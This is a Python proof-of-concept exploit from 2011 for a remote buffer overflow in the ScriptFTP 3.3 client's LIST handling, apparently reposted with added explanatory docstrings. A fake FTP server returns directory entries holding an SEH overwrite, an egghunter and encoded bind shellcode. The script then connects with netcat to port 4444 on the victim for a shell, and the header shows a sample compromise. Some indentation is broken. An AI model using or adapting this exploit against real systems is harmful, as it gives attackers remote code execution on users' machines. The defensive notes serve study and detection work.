ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)
来源:modpr0be[at]digital-echidna[dot]org 作者:modpr0be 发布时间:2011-09-21  

# Exploit Title: ScriptFTP <=3.3 Remote Buffer Overflow (LIST)
# Date: September 20, 2011
# Author: modpr0be
# Software Link: http://www.scriptftp.com/ScriptFTP_3_3_setup.exe
# Version: 3.3
# Tested on: Windows XP SP3, Windows Server 2003 SP1 (SE) (VMware 3.1.4 build-385536)
# CVE : -
#
# Thanks: offsec, exploit-db, corelanc0d3r, 5M7X, loneferret, mr_me, _sinner
#
# You should create your own script to work with ScriptFTP
# for example; enable passive and get the remote directory
# on your evil ftp server.
#
# my example script:
# OPENHOST("8.8.8.8","ftp","ftp")
# SETPASSIVE(ENABLED)
# GETLIST($list,REMOTE_FILES)
# CLOSEHOST
# save it to a file with .ftp extension (eg: exploit.ftp)

# root@bt :/# python scriptftp-bof-poc.py
# [*] ScriptFTP 3.3 Remote Buffer Overflow POC
# [*] by modpr0be[at]digital-echidna[dot]org.
# [*] thanks a lot to cyb3r.anbu | otoy :)
# =============================================
# [*] Evil FTP Server Ready
# [*] Server initiated.
# [*] Awaiting connection...
# [*] Connection created by 172.16.87.129.
# [*] Establishing session.
# [*] Pwning in progress..
# [*] This may take up 50 seconds or less.
# [!] Hunter is hunting the Egg ;)
# [!] Waiting for a shell..
# [!] 0wn3d..!
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\ScriptFTP>
#
# Yes, this poc is using PASSIVE connection and it will
# take some time to establish. I love the way we wait for a shell ;)

#!/usr/bin/python

import socket
import os
import sys
import time

class ftp_server:
    """Minimal fake FTP server that is the delivery side of this PoC.

    It listens on TCP/21, answers just enough of the FTP dialogue for a
    client to log in and request a passive-mode LIST, and then returns a
    directory listing whose file names carry the overflow buffer built
    in passive_do(). Python 2 only: ``print`` statements are used and the
    PASV port arithmetic in __init__ relies on integer ``/``.

    Indicators a defender can key on, all visible in the code below: a
    LIST data transfer whose entries are several kilobytes long, a
    control connection that goes silent for ~50 s right after the
    listing, and a follow-up TCP connection to port 4444 on the client.
    """
    def __init__(self):
        """Bind the control socket and precompute the PASV reply values.

        Binds port 21 on all interfaces (a privileged port on most
        systems), so this normally needs root. The address advertised in
        the 227 reply (see put()) is derived from ``self.host``, i.e.
        "0,0,0,0" -- presumably the client then falls back to the
        control-connection address; not verified here. ``self.passive``
        is written (here and on PASV) but never read in this class.
        """
        self.host = '0.0.0.0'
        self.passive_port = 7214
        self.log("""
[*] ScriptFTP <=3.3 Remote Buffer Overflow POC
[*] by modpr0be[at]digital-echidna[dot]org
[*] thanks a lot to cyb3r.anbu | otoy :)
=============================================
[*] Evil FTP Server Ready""")

        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(('', 21))
        self.sock.listen(1)

        # PASV encodes the port as (port / 256, port % 256). Integer
        # division is assumed (Python 2); under Python 3 ``/`` would give
        # a float and the 227 reply would be malformed.
        a = self.passive_port/256
        b = self.passive_port%256
        self.tuple_port = (a, b)
        self.host_join = ','.join(self.host.split('.'))
        self.passive = False

        self.log("[*] Server initiated.")

    def log(self, msg):
        """Print *msg* to stdout (Python 2 print statement)."""
        print msg

    def get(self):
        """Read one chunk from the control connection with CR/LF removed.

        A single recv(1024) is treated as one command: there is no line
        buffering, so two pipelined commands arriving in one segment
        would be merged, and a peer that has closed yields '' rather
        than raising.
        """
        return self.conn.recv(1024).replace('\r', '').replace('\n', '')

    def getcwd(self):
        """Return the last backslash-separated component of the cwd.

        chr(92) is the backslash. On a POSIX host (the transcript in the
        file header shows a Linux shell) the cwd contains no backslash,
        so the whole path is returned and ends up in the 250/257 replies.
        """
        return os.getcwd().split(chr(92))[-1]
   
    def put(self, ftr):
        """Send the canned reply for FTP status code *ftr* and return it.

        The reply text is looked up in a literal table, so an unknown
        code raises KeyError. The whole table is rebuilt on every call,
        which means getcwd() runs for each reply. Code 150 deliberately
        bundles the "226 Listing completed." line into the same send.
        socket.send() is used rather than sendall(), so a short write
        is not retried.
        """
        x = {

            150:" Data connection accepted from %s:%s; transfer starting.\r\n226 Listing completed."%(self.host, self.passive_port),
            200:" Type okay.",
            220:" %s Server is ready."%self.host,
            226:" Listing completed.",
            227:" Entering Passive Mode (%s,%s,%s)"%(self.host_join, self.tuple_port[0], self.tuple_port[1]),
            230:" User logged in, proceed.",
            250:' "/%s" is new cwd.'%self.getcwd(),
            257:' "/%s" is cwd.'%self.getcwd(),
            331:" User name okay, need password.",
            502:" Command not implemented.",
            551:" Requested action aborted. Page type unknown."     

                   }[ftr]

        s = '%s%s\r\n'%(ftr, x)
        self.conn.send(s)
        return s

    def main(self):
        """Serve one client: accept, greet, then answer commands until LIST.

        Only one control connection is ever accepted. ``addr`` is rebound
        in the PASV branch to the data-connection peer, so the address
        used by the final nc command is whichever accept() ran last.

        NOTE(review): as rendered here, several lines of this method
        (the put(220)/log calls after accept, the block after
        passive_do, and the else body) are not at the body's
        indentation; they were most likely tabs in the original, which
        Python 2 expands to 8 columns while Python 3 rejects the mix.
        The code is left byte-identical.
        """
        self.log("[*] Awaiting connection...")
        self.conn, addr = self.sock.accept ()
        self.log("[*] Connection created by %s.\n[*] Establishing session."%addr[0])
 self.put(220)
        self.log("[*] Pwning in progress..")
 self.log("[*] This may take up 50 seconds or less.")

        while 1:
            # Only the recv is guarded; a send failure inside put() or an
            # empty read from a closed peer is not handled here.
            try:
                data = self.get().upper()
            except socket.error:
                self.conn.close()
                self.sock.shutdown(socket.SHUT_RDWR)
                raise socket.error
    
            if data[:4] == 'USER':   s = 331
            elif data[:4] == 'PASS': s = 230
            elif data[:3] == 'PWD':  s = 257
            elif data[:4] == 'TYPE': s = 200
            elif data[:4] == 'PASV':
                # create passive port
                # A new listener on passive_port is created per PASV and
                # sock2 is never closed, so a repeated PASV would likely
                # fail to bind.
                self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.sock2.bind(('', self.passive_port ))
                self.sock2.listen(1)
                s = self.put(227)
                # Blocks until the client opens the data connection; this
                # rebinds addr to the data-connection peer.
                self.conn2, addr = self.sock2.accept()
                self.passive = True
                s = 0 # don't routine
     
            elif data[:3] == 'CWD':
                # The server process's own cwd follows the client-supplied
                # (already upper-cased) argument, relative to '..'. A bare
                # CWD becomes os.chdir('..CWD') and falls through to 551.
                try:
                    os.chdir('..%s'%data.split(' ')[-1])
                    s = 250
                except OSError:
                    s = 551
     
            elif data[:4] == 'LIST':
                s = self.put(150)
                s = self.passive_do(1)
                s = 0 # don't routine
                # Fixed 50 s wait, then a shell command assembled from the
                # peer address (a string from accept(), but still
                # os.system() with interpolated input). sys.exit() leaves
                # all sockets open; the OS closes them on process exit.
  print "[!] Hunter is hunting the Egg ;)"
  time.sleep(50)
  print "[!] Waiting for a shell.."
  time.sleep(2)
  print "[!] 0wn3d..!\n"
  os.system("nc %s 4444"%addr[0])
  sys.exit()
            else:
  s = 502

            if s:
                s = self.put(s)

    def passive_do(self, id):
        """Send the crafted LIST data over the passive data connection.

        Only id == 1 is handled (``id`` also shadows the builtin). The
        listing's file names are the buffer ``crash``: 1746 bytes of
        filler, the nSEH/SEH overwrite (a two-byte SEH value that is
        build-specific -- the header lists XP SP3 and 2003 SP1 as
        tested), short alignment stubs, an alphanumeric-encoded
        egghunter and an encoded bind payload (the original comment says
        it listens on 4444). Returns the listing string that was sent.

        NOTE(review): the indentation of this method is inconsistent as
        rendered, so where the ``if id == 1:`` body ends cannot be read
        off reliably; if the send at the bottom is outside the if, a
        call with id != 1 would hit an unbound ``res``. Code left
        byte-identical.
        """
        if id == 1:
     #bind to port 4444
     bind = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQ"
                    "APA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1A"
                    "IQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLI"
                    "XTIKPKPKPC0DIZENQXRS4DK0RNPTKPRLLTKR2LTTKBRO"
                    "8LOVWPJMVNQKONQGPFLOL1Q3LLBNLMPY18OLMM1I7K2J"
                    "P0RR74KPRN0DKOROLKQZ0DKOPRX4EY0RTPJKQXP0PTK1"
                    "8N8DKQHMPKQHSJCOLOYTKODDKM1HVNQKONQY0VLWQHOL"
                    "MKQWWP8IPCEL4LCSML8OK3MMTRUK2R84KQHMTM1YCQV4"
                    "KLLPKTKPXMLKQZ3TKM4TKKQ8P4IQ4O4MTQKQK1QPYPZ2"
                    "1KOK0PXQO1J4KN2ZKU61MQXNSP2KPKPS82W2SP21OQD3"
                    "80LSGNFLGKOZ56X4PM1KPKPO9XDPTPPQXNI3P2KM0KOX"
                    "U0PPPPP0POP0POPPPQXJJLOIOYPKOJ5SYGWNQIKPSBHM"
                    "2KPN1QLU9YVRJLPQFQGC8GRIK07QWKO8U0SR7C87GZIP"
                    "8KOKOJ50SR3PWRHCDZLOKYQKO8UPW5997QX2URN0MQQK"
                    "OYEQX33BMQTKPSYJCPWPWR701JV2JMBR926IRKMQVGWO"
                    "TMTOLKQKQTMPDNDLP7VKPQ40TB0PVPVPVOV26PNQFR6P"
                    "SR6C8SIXLOOTFKOXUCY9P0N0VPFKONPS8KXSWMMQPKO9"
                    "E7KL0X5W2QFQXVFTUWMEMKOHUOLKV3LKZU0KKYP2ULEW"
                    "KQ7MCT2BO2JKPQCKOZ5A")
    
     # 32bit egghunter from corelanc0d3r, thx ;)
     egghunter = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYA"
    "IAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA5"
    "8AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZB"
    "ABABABAB30APB944JBQVCQGZKOLO12PRQZKR1"
    "HXMNNOLKUQJRTJO6XKPNPKP44TKJZ6O3EJJ6O"
    "SEYWKOYWA")
      
     junk = "A" * 1746  #junk
     nseh = "\x61\x62"  #nseh
            seh = "\x45\x5B"   #seh ppr somewhere on scriptftp dir
           
     #prepare for align
            align = "\x60"   #pushad
     align += "\x73"   #nop/align
     align += "\x53"   #push ebx
     align += "\x73"   #nop/align
            align += "\x58"   #pop eax
     align += "\x73"   #nop/align
     align += "\x05\x02\x11"      #add eax,0x11000200
     align += "\x73"              #nop/align
            align += "\x2d\x01\x11"      #sub eax,0x11000120
     align += "\x73"              #nop/align
    
     #walking
        walk = "\x50"   #push eax
     walk += "\x73"   #nop/align
     walk += "\xc3"   #ret
   
     #align again
     align2 = "0t0t" + "\x73\x57\x73\x58\x73"  #nop/push edi/nop/pop eax/nop
     align2 += "\xb9\x1b\xaa"   #mov ecx,0xaa001b00
     align2 += "\xe8\x73"   #add al,ch + nop
     align2 += "\x50\x73\xc3"   #push eax,nop,ret

     # sampah1/sampah2 are filler bytes placed around the encoded stages.
     sampah1 = "\x44" * 106 + "\x73"  #eax+106/align nop
     sampah2 = "\x42" * 544   #right after shellcode
    
     crash = junk+nseh+seh+align+walk+sampah1+egghunter+sampah2+align2+bind+sampah1

            # Three LIST entries; the first and third use crash as the file
            # name, the middle one is a plain placeholder entry.
            res = """-rwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 """+crash+""".txt\r\ndrwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 A\r\nrwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 """+ crash +".txt\r\n"

        # conn2 is the data connection accepted in main()'s PASV branch;
        # send() (not sendall()) may write only part of the listing.
        self.conn2.send(res)
        # self.conn2.send('\r\n') # send blank
 return res

# Script entry: run a single serving session. A socket error (for
# example port 21 already in use or not bindable, or the peer dropping
# the connection) is reported on one line instead of a traceback.
try:
    server = ftp_server()
    server.main()
except socket.error:
    print "[!] Socket is not ready, shutting down...\n"

 


 